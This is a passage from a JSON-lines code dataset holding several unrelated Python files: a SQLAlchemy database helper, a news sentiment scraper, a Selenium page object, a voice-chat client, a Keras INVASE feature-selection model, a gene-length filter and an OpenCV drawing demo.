['root_tweet_city', 'root_tweet_state',\n 'incident_date']\n reconcilation_dict = {}\n for index, sub in enumerate(subjects):\n query = f\"\"\"\n select count({sub}), {sub} from \n (select * from conversations \n as c inner join force_ranks \n as fr on c.incident_id = fr.incident_id \n where c.incident_id = {root_id}) as subquery\n group by {sub}\n \"\"\"\n check_data = session.execute(query).fetchall()\n reconcilation_dict[f\"{index}\"] = check_data\n return reconcilation_dict\n elif action == 1:\n \"\"\" Brings all the tweet-ids that are associated with the incident_id \"\"\"\n query = (select(Conversations.tweet_id).\n filter(Conversations.incident_id == root_id))\n data = session.execute(query).fetchall()\n return data\n elif action == 2:\n \"\"\" Brings the total number of incident ids in the conversations table \"\"\"\n query = select(func.count(Conversations.incident_id).filter(\n Conversations.incident_id == root_id))\n data = session.execute(query).fetchall()\n return data\n else:\n return 'Pass 0, 1, 2'\n\n def get_twelves(self):\n \"\"\"\n get all conversations with value of 12\n and corresponding data from force_ranks\n \"\"\"\n with 
self.Sessionmaker() as session:\n query = (select(Conversations, ForceRanks).\n join(ForceRanks,\n and_(Conversations.tweet_id == ForceRanks.tweet_id,\n Conversations.conversation_status == 12)))\n data = session.execute(query).fetchall()\n\n out = []\n for i in data:\n record = {'tweet_id': i['Conversations'].tweet_id,\n 'city': i['Conversations'].root_tweet_city,\n 'confidence': None,\n 'description': i['ForceRanks'].description,\n 'force_rank': i['Conversations'].root_tweet_force_rank,\n 'incident_date': i['Conversations'].root_tweet_date,\n 'incident_id': i['ForceRanks'].incident_id,\n 'lat': i['Conversations'].root_tweet_lat,\n 'long': i['Conversations'].root_tweet_long}\n try:\n record['src'] = {e: i for (e, i) in enumerate(\n i['ForceRanks'].src.replace('\"', '', ).replace('[',\n '').replace(\n ']', '').split(','))}\n except (KeyError, AttributeError):\n pass\n record['state'] = i['Conversations'].root_tweet_state\n record['status'] = i['ForceRanks'].status\n try:\n record['tags'] = {e: i for (e, i) in enumerate(\n i['ForceRanks'].tags.replace('\"', '', ).replace('[',\n '').replace(\n ']', '').split(','))}\n except (KeyError, AttributeError):\n pass\n print(i['ForceRanks'].tags)\n record['title'] = i['ForceRanks'].title\n record['user_name'] = i['ForceRanks'].user_name\n out.append(record)\n\n return out\n\n def get_to_advance(self):\n \"\"\" gets highest conversation_status row of each tweet_id \"\"\"\n with self.Sessionmaker() as session:\n query1 = select(\n func.max(Conversations.conversation_status).label(\"status\"),\n Conversations.tweet_id\n ).group_by(\n Conversations.tweet_id\n ).cte('wow')\n\n query2 = select(\n Conversations\n ).join(\n query1,\n query1.c.tweet_id == Conversations.tweet_id\n ).filter(\n Conversations.conversation_status == query1.c.status\n )\n\n data = session.execute(query2)\n\n return [i[0] for i in data.fetchall()]\n\n def update_conversation_checks(self, root_id):\n \"\"\" iterates conversation_checks column of matching tweet_id \"\"\"\n query = update(Conversations).where(\n Conversations.tweet_id == str(root_id)\n ).values(checks_made=Conversations.checks_made + 1)\n\n with self.Sessionmaker() as session:\n session.execute(query)\n session.commit()\n\n def convert_invocation_conversations(self, data):\n \"\"\" converts invocation dict to correct column names \"\"\"\n clean_data = Conversations()\n\n clean_data.incident_id = data.incident_id\n clean_data.form = data.form\n clean_data.tweet_id = int(data.tweet_id)\n clean_data.in_reply_to_id = data.user_name\n\n return clean_data\n\n def convert_form_conversations(self, data):\n \"\"\" Converts form dict to correct column names \"\"\"\n clean_data = Conversations()\n\n clean_data.form = 1\n clean_data.incident_id = data.incident_id\n clean_data.tweet_id = int(data.tweet_id)\n clean_data.root_tweet_city = data.city\n clean_data.root_tweet_state = data.state\n clean_data.root_tweet_lat = data.lat\n clean_data.root_tweet_long = data.long\n clean_data.root_tweet_date = data.incident_date\n clean_data.root_tweet_force_rank = data.force_rank\n clean_data.tweeter_id = data.user_name\n\n return clean_data\n\n def initialize_table(self, tablename):\n \"\"\" creates table if not exists and table model exists \"\"\"\n\n if tablename in self.TABLE_NAMES:\n table = self.TABLE_NAMES[tablename]\n else:\n return \"Table model not found\"\n\n insp = inspect(self.engine)\n if not insp.has_table(tablename):\n table.__table__.create(self.engine)\n\n def reset_table(self, tablename):\n \"\"\" DANGER! 
this will delete all data in the table!!! \"\"\"\n\n if tablename in self.TABLE_NAMES:\n table = self.TABLE_NAMES[tablename]\n else:\n return \"Table model not found\"\n\n check = input('Are you sure? This will delete all table data (Y/N):')\n if check == 'Y':\n insp = inspect(self.engine)\n if insp.has_table(tablename):\n table.__table__.drop(self.engine)\n self.initialize_table(tablename)\n elif check == 'N':\n pass\n else:\n print('You must answer Y or N to complete this function.')\n\n def drop_table(self, tablename):\n \"\"\" DANGER! this will delete the table!!! \"\"\"\n\n if tablename in self.TABLE_NAMES:\n table = self.TABLE_NAMES[tablename]\n else:\n return \"Table model not found\"\n\n check = input('Are you sure? This will delete all table data (Y/N):')\n if check == 'Y':\n insp = inspect(self.engine)\n if insp.has_table(tablename):\n table.__table__.drop(self.engine)\n elif check == 'N':\n pass\n else:\n print('You must answer Y or N to complete this function.')\n\n def get_table(self, table_name, table_col_name=None, column_value=None):\n \"\"\"\n This function will select tables based on the table name.\n This function is a helper function used to help in\n SQLAlchemy queries.\n \"\"\"\n with self.Sessionmaker() as session:\n if column_value is not None:\n query = (select(table_name).where(\n table_col_name == column_value))\n data = session.execute(query).fetchall()\n return data\n\n else:\n query = select(table_name)\n data = session.execute(query).fetchall()\n return data\n\n\n def insert_data(self, data):\n \"\"\"\n Adds the given ORM object to the current session and commits it\n (generic insert/update helper).\n Originally a \"delete_script\" function was conceived, but the potential\n need for more data on past script testing led to deactivating scripts\n (setting 'active' to False) and committing them through this helper\n instead.\n\n ----Labs 39 ---\n I suggest following our flow of creating helper function(s) in db.py to\n update 'bot_scripts' for the activate and deactivate functions.\n Then check endpoints in main.py to test this and set up the FE\n for connecting the modal in Admin dashboard.\n \"\"\"\n # Persist the added or modified object\n with self.Sessionmaker() as session: \n session.add(data)\n session.commit()\n","sub_path":"app/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":29049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"28312197","text":"'''\nCreated on November 17, 2019\n\n@author : Svetlana Morozov\n\n'''\n\nimport sentiment_score\nimport bs4\nimport requests\nimport pandas as pd\n#from yahoo-finance import Share\nimport matplotlib.finance as fin\n\n#import quotes_historical_yahoo, candlestick,\\\n# plot_day_summary, candlestick2, fetch_historical_yahoo\n\nfrom sklearn.tree import DecisionTreeRegressor\n\n#from scikit-learn import RegressionDesicionTree\n\nimport sys\nimport urllib3\nimport html5lib\nimport html.parser\nfrom html.parser import HTMLParser\nimport re\n\n\n\n#BASE_URL = \"https://www.google.com/finance\"\n#BASE_URL = \"https://www.google.com/finance?tab=we&authuser=0\"\nBASE_URL = \"https://www.sfgate.com/bayarea\"\n\n\n#BASE_URL = \"https://www.bloomberg.com\"\ncolumns= ['title','rank','url','text']\n\n\nprint(\"BASE_URL : \",BASE_URL)\n\ndef openLink(url):\n page = requests.get(url)\n soup = bs4.BeautifulSoup(page.content, 'html.parser')\n\n return soup\n\ndef colRename(df,cols):\n for i in range(0,len(cols)):\n df.rename(columns = {i: cols[i]},inplace=True)\n\n\npage = 
requests.get(BASE_URL)\nsoup = bs4.BeautifulSoup(page.content, 'html.parser')\n\nmainPage = soup.findAll('a', {\"class\":\"hdn-analytics\"})\n\n\narrNewsLinks=[]\narrNews=[]\n\n#Getting links from main page\n\nprint(\"Getting links from main page ... \")\nfor item in mainPage:\n url = item.get('href')\n if \"http\" in url:\n link = url\n else:\n link = BASE_URL + url\n title = item.getText()\n if title.rstrip().lstrip() !=\"\" and len(title.split(\" \")) > 6 and url !=\"\" and url !=\"/\":\n arrNewsLinks.append([title.rstrip().lstrip(), link])\n\n\ndfNewsLinks = pd.DataFrame(arrNewsLinks).drop_duplicates()\n#dfNews.to_csv('news.csv')\n\n#Getting text for main articles\nprint(\"Getting text for main articles ... \")\nfor index, row in dfNewsLinks.iterrows():\n\n article=''\n content = openLink(row[1]).findAll('p')\n for item in content:\n article = article + ' ' + item.text\n\n\n arrNews.append([row[0],row[1],article])\n\n\n\ndfNews = pd.DataFrame(arrNews).drop_duplicates()\n\n# Read sentiment dictionary\nsent_map = sentiment_score.init_sentiment()\n\n\n# Running sentiment analysis (ranking stories)\n\nprint(\"Running sentiment analysis (ranking stories)\")\nfinalNewsList=[]\n\nfor index, row in dfNews.iterrows():\n rank = sentiment_score.sentiment_score(row[2], sent_map)\n finalNewsList.append([row[0],rank,row[1],row[2]])\n\n\n\ndfAllNews = pd.DataFrame(finalNewsList)\ndfFinalNews = dfAllNews.drop_duplicates()\n\ncolRename(dfFinalNews,columns)\ndfNegative = dfFinalNews[dfFinalNews['rank'] <0]\ndfPositive = dfFinalNews[dfFinalNews['rank'] >0]\ndfNeutral = dfFinalNews[dfFinalNews['rank'] ==0]\n\nprint (\"=\"*20)\nprint(\"Ran ranking for \"+ str(len(dfFinalNews))+ \" articles\")\nprint(\"Positive news : \", len(dfPositive))\nprint(\"Negative news : \", len(dfNegative))\nprint(\"Neutral news : \", len(dfNeutral))\nprint (\"=\"*20)\n\ndfFinalNewsSorted = dfFinalNews.sort_values('rank',ascending=True)\n\nprint (\"Saving the results of ranking into a file ...\")\ndfFinalNewsSorted.to_excel('finalNews.xlsx',sheet_name='news',index=False)\n\nprint(\"finished\")\n\nprint (\"=\"*20)\n\n","sub_path":"good_news_1.0.py","file_name":"good_news_1.0.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"150721029","text":"# encoding = utf-8\nfrom util.ObjectMap import *\nfrom util.ParseConfigurationFile import ParseConfigFile\n\nclass HomePage(object):\n def __init__(self,driver):\n self.driver = driver\n self.parseCF = ParseConfigFile()\n\n def addressLink(self):\n try:\n # Read the locate type and locator expression for the address book button from the locator config file\n locateType,locatorExpression = self.parseCF.getOptionValue(\\\n \"163mail_homePage\",\"homePage.addressbook\").split(\">\")\n # Get the address book element on the page shown after a successful login, and return it to the caller\n elementObj = getElement(self.driver,locateType,locatorExpression)\n return elementObj\n except Exception as e:\n raise e\n","sub_path":"pageObjects/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"625256258","text":"from os import error\nimport socket\nimport select\nimport sounddevice as sd\nimport pyaudio\nimport sys\nfrom threading import Thread\nimport time\nfrom contextlib import closing\nimport platform\n\nclass Client:\n def __init__(self):\n self.tcp_conn_status = False\n self.server_udp_port = None\n self.server_tcp_port = None\n self.server_address = '127.0.0.1'\n self.nick = 'Anonymous'\n\n self.guiMessage = 0\n\n 
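# 64 KiB receive buffer, applied to the UDP socket via SO_RCVBUF in sockets_setup() below\n 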
self.BUFF_SIZE = 65536\n\n #audio settings\n self.CHUNK = 32\n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 44100\n\n self.tcp_s = None\n self.udp_s = None\n\n self.muted = False\n self.usersList = []\n self.p = pyaudio.PyAudio()\n self.refresh_audio_setup()\n\n def refresh_audio_setup(self):\n #init mic recording and sound playback\n \n sd._terminate()\n sd._initialize()\n\n inDev, outDev = self.audio_devices()\n \n try:\n inDevId = inDev[0][0]\n self.rec_stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK,\n input_device_index=inDevId)\n except:\n pass\n\n try: \n outDevId = outDev[0][0]\n self.play_stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n output=True,\n frames_per_buffer=self.CHUNK,\n output_device_index=outDevId)\n except:\n pass\n\n return inDev, outDev\n \n def in_setup(self, inDevId):\n print(inDevId)\n try:\n self.rec_stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n frames_per_buffer=self.CHUNK,\n input_device_index=inDevId)\n except:\n pass\n \n def out_setup(self, outDevId):\n print(outDevId)\n try:\n self.play_stream = self.p.open(format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n output=True,\n frames_per_buffer=self.CHUNK,\n output_device_index=outDevId)\n except:\n pass\n\n def audio_devices(self):\n inputDevs = []\n outputDevs = []\n \n #Choose hostapi based on system and list devices\n if(platform.system() == 'Windows'):\n hostApi = self.p.get_host_api_info_by_type(pyaudio.paMME)\n for id in range(len(sd.query_devices())):\n dev_dict = sd.query_devices(device=id)\n if(dev_dict.get('hostapi') == hostApi.get('index')):\n if('SPDIF' not in dev_dict.get('name')): \n if(dev_dict.get('max_input_channels') > 0):\n inputDevs.append((id, dev_dict.get('name')))\n elif(dev_dict.get('max_output_channels') > 0):\n outputDevs.append((id, dev_dict.get('name')))\n else:\n for id in range(len(sd.query_devices())):\n dev_dict = sd.query_devices(device=id)\n if('SPDIF' not in dev_dict.get('name')): \n if(dev_dict.get('max_input_channels') > 0):\n inputDevs.append((id, dev_dict.get('name')))\n elif(dev_dict.get('max_output_channels') > 0):\n outputDevs.append((id, dev_dict.get('name')))\n\n #Move default to first element in list\n\n try:\n defaultInputDev = sd.default.device[0]\n for i in range(len(inputDevs)):\n if(inputDevs[i][0] == defaultInputDev):\n inputDevs.insert(0, inputDevs.pop(i))\n except:\n self.guiMessage = 2\n\n try:\n defaultOutputDev = sd.default.device[1]\n for i in range(len(outputDevs)):\n if(outputDevs[i][0] == defaultOutputDev):\n outputDevs.insert(0, outputDevs.pop(i))\n except:\n self.guiMessage = 3\n\n return inputDevs, outputDevs\n\n def sockets_setup(self):\n self.tcp_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.udp_s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.udp_s.setsockopt(socket.SOL_SOCKET,socket.SO_RCVBUF,self.BUFF_SIZE)\n self.udp_s.bind(('', 0))\n self.udp_s.settimeout(0.2)\n self.tcp_s.settimeout(1)\n\n def set_nick(self, nick):\n self.nick = nick\n\n def set_server_addr(self, ip):\n self.server_address = ip\n\n def set_server_tcp_port(self, port):\n self.server_tcp_port = port\n\n def tcpConnection(self):\n data = 'JOIN ' + self.nick + ' ' + str(self.udp_s.getsockname()[1])\n self.tcp_s.send(bytes(data, 'UTF-8'))\n data = self.tcp_s.recv(1024)\n decoded = data.decode('UTF-8')\n message = decoded.split()\n if (message[0] 
== \"OK\" and len(message[1]) > 0):\n self.tcp_conn_status = True\n self.server_udp_port = int(message[1])\n #Start voice voice streaming\n Thread(target=self.udpRecv).start()\n Thread(target=self.udpSend).start()\n else:\n self.tcp_s.shutdown(socket.SHUT_RDWR)\n self.tcp_s.close()\n\n while(self.tcp_conn_status == True):\n #check if everything is ok\n try:\n ready_to_read, ready_to_write, in_error = \\\n select.select([self.tcp_s,], [self.tcp_s,], [], 5)\n \n if len(ready_to_read) > 0:\n recv = self.tcp_s.recv(1024)\n decoded = recv.decode('UTF-8')\n message = decoded.split()\n if (message[0] == \"LIST\"):\n users = []\n for i in range(1, len(message)):\n users.append(message[i])\n self.usersList = users\n\n if len(ready_to_write) > 0:\n self.tcp_s.send(bytes('AWLI', 'UTF-8'))\n\n time.sleep(1)\n\n except:\n if(self.tcp_conn_status == True):\n try:\n self.tcp_s.shutdown(socket.SHUT_RDWR)\n self.tcp_s.close()\n self.tcp_conn_status = False\n self.guiMessage = 1\n except:\n self.tcp_s.close()\n self.tcp_conn_status = False\n self.guiMessage = 1\n break\n\n def disconnect(self):\n try:\n self.tcp_s.send(bytes(\"LEAV\", 'UTF-8'))\n recv = self.tcp_s.recv(1024)\n decoded = recv.decode('UTF-8')\n if(decoded == 'BYE'):\n self.tcp_s.shutdown(socket.SHUT_RDWR)\n self.tcp_s.close()\n self.tcp_conn_status = False\n except:\n self.tcp_s.close()\n self.tcp_conn_status = False\n print(\"disconnected\")\n\n\n def udpSend(self):\n while True:\n if (self.tcp_conn_status == True): \n try:\n if(self.muted == False):\n data = self.rec_stream.read(self.CHUNK, exception_on_overflow=False)\n else:\n data = b''\n self.udp_s.sendto(data, (self.server_address, self.server_udp_port))\n except:\n pass\n else:\n break\n \n def udpRecv(self):\n while True:\n if (self.tcp_conn_status == True):\n try:\n data, addr = self.udp_s.recvfrom(2048)\n self.play_stream.write(data)\n except:\n pass\n else:\n break\n\n def Start(self, nick, server_addr, server_tcp_port):\n self.sockets_setup()\n self.set_nick(nick)\n self.set_server_addr(server_addr)\n self.set_server_tcp_port(server_tcp_port)\n self.muted = False\n self.usersList = []\n print('connecting')\n self.tcp_s.connect((self.server_address, self.server_tcp_port))\n print('connected')\n Thread(target=self.tcpConnection).start()\n\n def mute(self):\n if(self.muted == False):\n self.muted = True\n else:\n self.muted = False\n \n return self.muted\n\nif (__name__ == \"__main__\"):\n client = Client()\n client.Start('Tester', '127.0.0.1', 5001)","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":9026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"264135625","text":"'''\nWritten by Jinsung Yoon\nDate: Jan 1th 2019\nINVASE: Instance-wise Variable Selection using Neural Networks Implementation on Synthetic Datasets\nReference: J. Yoon, J. Jordon, M. van der Schaar, \"IINVASE: Instance-wise Variable Selection using Neural Networks,\" International Conference on Learning Representations (ICLR), 2019.\nPaper Link: https://openreview.net/forum?id=BJg_roAcK7\nContact: jsyoon0823@g.ucla.edu\n\n---------------------------------------------------\n\nInstance-wise Variable Selection (INVASE) - with baseline networks\n'''\n\n#%% Necessary packages\n# 1. 
Keras\nfrom keras.layers import Input, Dense, Multiply\nfrom keras.layers import BatchNormalization\nfrom keras.models import Sequential, Model, load_model\nfrom keras.optimizers import Adam\nfrom keras import regularizers\nfrom keras import backend as K\n\n# 2. Others\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score, average_precision_score, accuracy_score\n\n#%% Define PVS class\nclass PVS():\n \n # 1. Initialization\n '''\n x_train: training samples\n data_type: Syn1 to Syn 6\n '''\n def __init__(self, x_train, load_model=False):\n \n self.latent_dim1 = 100 # Dimension of actor (generator) network\n self.latent_dim2 = 200 # Dimension of critic (discriminator) network\n self.batch_size = 100 # Batch size\n self.epochs = 20000 # Epoch size (large epoch is needed due to the policy gradient framework)\n self.lamda = 0.1 # Hyper-parameter for the number of selected features\n\n self.input_shape = x_train.shape[1] # Input dimension\n self.output_size = 4\n\n # Activation.\n self.activation = 'selu'\n\n # Use Adam optimizer with learning rate = 0.00001\n optimizer = Adam(0.00001)\n \n if load_model:\n self.load_models()\n else:\n # Build and compile the discriminator (critic)\n self.discriminator = self.build_discriminator()\n # Use categorical cross entropy as the loss\n self.discriminator.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['acc'])\n\n # Build the generator (actor)\n self.generator = self.build_generator()\n # Use custom loss (my loss)\n self.generator.compile(loss=self.my_loss, optimizer=optimizer)\n\n # Build and compile the value function\n self.valfunction = self.build_valfunction()\n # Use categorical cross entropy as the loss\n self.valfunction.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['acc'])\n\n #%% Custom loss definition\n def my_loss(self, y_true, y_pred):\n \n # dimension of the features\n d = y_pred.shape[1] \n\n # Put all four in y_true \n # 1. selected probability\n sel_prob = y_true[:,:d]\n # 2. discriminator output\n dis_prob = y_true[:,d:(d + self.output_size)]\n # 3. valfunction output\n val_prob = y_true[:, (d + self.output_size):(d + 2 * self.output_size)]\n # 4. ground truth\n y_final = y_true[:, (d + 2 * self.output_size):]\n\n # A1. Compute the rewards of the actor network\n Reward1 = tf.reduce_sum(y_final * tf.log(dis_prob + 1e-8), axis = 1) \n \n # A2. Compute the rewards of the baseline (value function) network\n Reward2 = tf.reduce_sum(y_final * tf.log(val_prob + 1e-8), axis = 1) \n\n # Difference is the rewards\n Reward = Reward1 - Reward2\n\n # B. Policy gradient loss computation. \n loss1 = Reward * tf.reduce_sum( sel_prob * K.log(y_pred + 1e-8) + (1-sel_prob) * K.log(1-y_pred + 1e-8), axis = 1) - self.lamda * tf.reduce_mean(y_pred, axis = 1)\n \n # C. 
Maximize the loss1\n loss = tf.reduce_mean(-loss1)\n\n return loss\n\n #%% Generator (Actor)\n def build_generator(self):\n\n model = Sequential()\n \n model.add(Dense(100, activation=self.activation, name = 's/dense1', kernel_regularizer=regularizers.l2(1e-3), input_dim = self.input_shape))\n model.add(Dense(self.input_shape, activation = 'sigmoid', name = 's/dense2', kernel_regularizer=regularizers.l2(1e-3)))\n \n model.summary()\n\n feature = Input(shape=(self.input_shape,), dtype='float32')\n select_prob = model(feature)\n\n return Model(feature, select_prob)\n\n #%% Discriminator (Critic)\n def build_discriminator(self):\n\n model = Sequential()\n \n model.add(Dense(200, activation=self.activation, name = 'dense1', kernel_regularizer=regularizers.l2(1e-3), input_dim = self.input_shape)) \n model.add(BatchNormalization()) # Use Batch norm for preventing overfitting\n model.add(Dense(self.output_size, activation ='softmax', name ='dense2', kernel_regularizer=regularizers.l2(1e-3)))\n \n model.summary()\n \n # There are two inputs to be used in the discriminator\n # 1. Features\n feature = Input(shape=(self.input_shape,), dtype='float32')\n # 2. Selected Features\n select = Input(shape=(self.input_shape,), dtype='float32') \n \n # Element-wise multiplication\n model_input = Multiply()([feature, select])\n prob = model(model_input)\n\n return Model([feature, select], prob)\n \n #%% Value Function\n def build_valfunction(self):\n\n model = Sequential()\n \n model.add(Dense(200, activation=self.activation, name = 'v/dense1', kernel_regularizer=regularizers.l2(1e-3), input_dim = self.input_shape)) \n model.add(BatchNormalization()) # Use Batch norm for preventing overfitting\n model.add(Dense(self.output_size, activation ='softmax', name = 'v/dense2', kernel_regularizer=regularizers.l2(1e-3)))\n \n model.summary()\n \n # There is one input to be used in the value function\n # 1. 
Features\n feature = Input(shape=(self.input_shape,), dtype='float32') \n \n # Element-wise multiplication\n prob = model(feature)\n\n return Model(feature, prob)\n\n #%% Sampling the features based on the output of the generator\n def Sample_M(self, gen_prob):\n \n # Shape of the selection probability\n n = gen_prob.shape[0]\n d = gen_prob.shape[1]\n \n # Sampling\n samples = np.random.binomial(1, gen_prob, (n,d))\n \n return samples\n\n #%% Training procedure\n def train(self, x_train, y_train):\n\n # For each epoch (actually iterations)\n for epoch in range(self.epochs):\n\n #%% Train Discriminator\n # Select a random batch of samples\n idx = np.random.randint(0, x_train.shape[0], self.batch_size)\n x_batch = x_train[idx,:]\n y_batch = y_train[idx,:]\n\n # Generate a batch of probabilities of feature selection\n gen_prob = self.generator.predict(x_batch)\n \n # Sampling the features based on the generated probability\n sel_prob = self.Sample_M(gen_prob) \n \n # Compute the prediction of the critic based on the sampled features (used for generator training)\n dis_prob = self.discriminator.predict([x_batch, sel_prob])\n\n # Train the discriminator\n d_loss = self.discriminator.train_on_batch([x_batch, sel_prob], y_batch)\n\n #%% Train Value function\n\n # Compute the prediction of the value function (used for generator training)\n val_prob = self.valfunction.predict(x_batch)\n\n # Train the value function\n v_loss = self.valfunction.train_on_batch(x_batch, y_batch)\n \n #%% Train Generator\n # Use four things as the y_true: sel_prob, dis_prob, val_prob, and ground truth (y_batch)\n y_batch_final = np.concatenate( (sel_prob, np.asarray(dis_prob), np.asarray(val_prob), y_batch), axis = 1 )\n\n # Train the generator\n g_loss = self.generator.train_on_batch(x_batch, y_batch_final)\n\n #%% Plot the progress\n dialog = 'Epoch: ' + str(epoch) + ', d_loss (Acc): ' + str(d_loss[1]) + ', v_loss (Acc): ' + str(v_loss[1]) + ', g_loss: ' + str(np.round(g_loss,4))\n\n if epoch % 100 == 0:\n print(dialog)\n \n #%% Selected Features \n def output(self, x_train):\n \n gen_prob = self.generator.predict(x_train)\n \n return np.asarray(gen_prob)\n \n #%% Prediction Results \n def get_prediction(self, x_train, m_train):\n \n val_prediction = self.valfunction.predict(x_train)\n \n dis_prediction = self.discriminator.predict([x_train, m_train])\n \n return np.asarray(val_prediction), np.asarray(dis_prediction)\n\n def save_models(self):\n self.generator.save('./model/generator.h5')\n self.valfunction.save('./model/valfunction.h5')\n self.discriminator.save('./model/discriminator.h5')\n\n def load_models(self):\n self.generator = load_model('./model/generator.h5', custom_objects={'my_loss': self.my_loss})\n self.valfunction = load_model('./model/valfunction.h5')\n self.discriminator = load_model('./model/discriminator.h5')\n\n\n#%% Main Function\nif __name__ == '__main__':\n \n # Data generation function import\n from Data_Reader import read_data\n\n x_train, y_train, x_test, y_test = read_data(source=\"./data/pathway_activity.csv\")\n\n #%% \n # 1. PVS Class call\n PVS_Alg = PVS(x_train, load_model=True)\n \n # 2. Algorithm training\n PVS_Alg.train(x_train, y_train)\n \n # 3. Get the selection probability on the testing set\n Sel_Prob_Test = PVS_Alg.output(x_test)\n \n # 4. 
Selected features\n score = 1.*(Sel_Prob_Test > 0.5)\n num_sel_features = score.sum() / len(score)\n print(\"Number of Selected Features:\", num_sel_features)\n\n # np.savetxt(\"testset_selected_feature.csv\", score, delimiter=',')\n PVS_Alg.save_models()\n\n # 5. Prediction\n val_predict, dis_predict = PVS_Alg.get_prediction(x_test, score)\n\n val_accuracy_table = [[0 for _ in range(PVS_Alg.output_size)] for _ in range(PVS_Alg.output_size)]\n dis_accuracy_table = [[0 for _ in range(PVS_Alg.output_size)] for _ in range(PVS_Alg.output_size)]\n\n val_label = np.argmax(val_predict, axis=1)\n dis_label = np.argmax(dis_predict, axis=1)\n true_label = np.argmax(y_test, axis=1)\n\n for i in range(len(true_label)):\n val_accuracy_table[val_label[i]][true_label[i]] += 1\n dis_accuracy_table[dis_label[i]][true_label[i]] += 1\n\n # Compute weighted F1 score\n from sklearn.metrics import f1_score\n val_f1_score = f1_score(true_label, val_label, average='weighted')\n dis_f1_score = f1_score(true_label, dis_label, average='weighted')\n\n # Compute Accuracy\n val_correct = 0\n dis_correct = 0\n\n for i in range(PVS_Alg.output_size):\n val_correct += val_accuracy_table[i][i]\n dis_correct += dis_accuracy_table[i][i]\n\n val_accuracy = val_correct / len(val_label)\n dis_accuracy = dis_correct / len(dis_label)\n\n # Print Accuracy Table\n print(\"\\nBaseline Prediction\")\n for i in range(len(val_accuracy_table)):\n for j in range(len(val_accuracy_table[i])):\n print(val_accuracy_table[i][j], end=' ')\n print()\n print(\"Weighted F1 Score: {:.4f}\".format(val_f1_score))\n print(\"Accuracy: {:.4f}\".format(val_accuracy))\n\n print(\"\\nPredictor Prediction\")\n for i in range(len(dis_accuracy_table)):\n for j in range(len(dis_accuracy_table[i])):\n print(dis_accuracy_table[i][j], end=' ')\n print()\n print(\"Weighted F1 Score: {:.4f}\".format(dis_f1_score))\n print(\"Accuracy: {:.4f}\".format(dis_accuracy))\n","sub_path":"INVASE.py","file_name":"INVASE.py","file_ext":"py","file_size_in_byte":11956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"650237301","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 4 15:10:29 2019\n\n@author: mfba\n\"\"\"\n\nimport pandas as pd\nimport os\n\n\ndef remove_small_genes(annotations, min_gene_size):\n\n genes_to_remove = []\n\n # Iterate over rows\n for index, row in annotations.iterrows():\n\n # Find gene length\n gene_length = row[\"end\"] - row[\"start\"]\n\n # Check if smaller than minimum length\n if gene_length < min_gene_size:\n genes_to_remove.append(index)\n\n # Remove all genes smaller than minimum\n annotations = annotations.drop(annotations.index[genes_to_remove])\n return annotations.reset_index(drop=True)\n\n\ndef remove_big_genes(annotations, max_gene_size):\n\n genes_to_remove = []\n\n # Iterate over rows\n for index, row in annotations.iterrows():\n\n # Find gene length\n gene_length = row[\"end\"] - row[\"start\"]\n\n # Check if the gene reaches the maximum length\n if gene_length >= max_gene_size:\n genes_to_remove.append(index)\n\n # Remove all genes at or above the maximum\n annotations = annotations.drop(annotations.index[genes_to_remove])\n return annotations.reset_index(drop=True)\n\n\nif __name__ == \"__main__\":\n # Local path of git directory\n os.chdir(\"D:/DTU/02456 - Deep Learning/final_project/drastic/data\")\n\n # Remember to change to local path\n filepath = \"GCA_000008865.2_ASM886v2_feature_table.tsv\"\n\n # Save gene meta data in Panda frame\n annotations = pd.read_csv(filepath, 
sep=\"\\t\")\n\n # Minimum gene size. All genes less than this will be removed.\n min_gene_size = 200\n\n # Retrieve valid genes\n ann = remove_small_genes(annotations, min_gene_size)\n\n print(\"End of script.\")\n","sub_path":"src/pre-processing/remove_small_genes.py","file_name":"remove_small_genes.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"252764061","text":"import cv2\nimport numpy as np\n\n# cap = cv2.VideoCapture('image/mission.jpg')\ncap = cv2.VideoCapture(1, cv2.CAP_DSHOW)\nwhile True:\n ret, frame = cap.read()\n width = int(cap.get(3)) # 3 for width from document\n height = int(cap.get(4)) # 4 for height from document\n\n img = cv2.line(frame, (0, 0), (width, height), (0, 255, 0), 5)\n img = cv2.line(img, (0, height), (width, 0), (0, 255, 0), 20)\n img = cv2.rectangle(img, (250, 50), (500, 300), (56, 23, 160), 10)\n img = cv2.circle(img, (50, 50), 50, (0, 0, 255), -1)\n font = cv2.FONT_HERSHEY_COMPLEX\n img = cv2.putText(img, \"tatti\", (10, height - 100),\n font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n\n cv2.imshow('frame', img)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"drawlines.py","file_name":"drawlines.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"449926187","text":"from typing import List, 